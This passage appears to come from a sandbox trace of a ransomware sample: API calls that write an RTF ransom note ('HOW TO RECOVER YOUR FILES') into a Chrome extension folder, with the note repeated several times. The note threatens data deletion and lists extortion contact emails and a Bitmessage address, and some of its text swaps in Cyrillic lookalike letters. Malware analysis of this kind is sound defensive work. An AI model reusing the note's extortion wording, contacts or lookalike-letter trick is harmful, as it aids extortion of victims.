configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.167] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.167] CloseHandle (hObject=0x2e8) returned 1 [0292.168] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\#readme_eman#.rtf")) returned 0xffffffff [0292.168] GetLastError () returned 0x2 [0292.168] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 